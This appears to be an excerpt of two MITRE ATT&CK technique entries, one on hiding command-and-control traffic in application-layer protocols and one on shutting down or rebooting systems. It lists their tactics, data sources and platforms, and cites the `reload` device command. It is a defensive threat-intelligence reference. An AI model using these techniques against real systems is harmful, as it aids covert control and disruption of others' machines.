Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre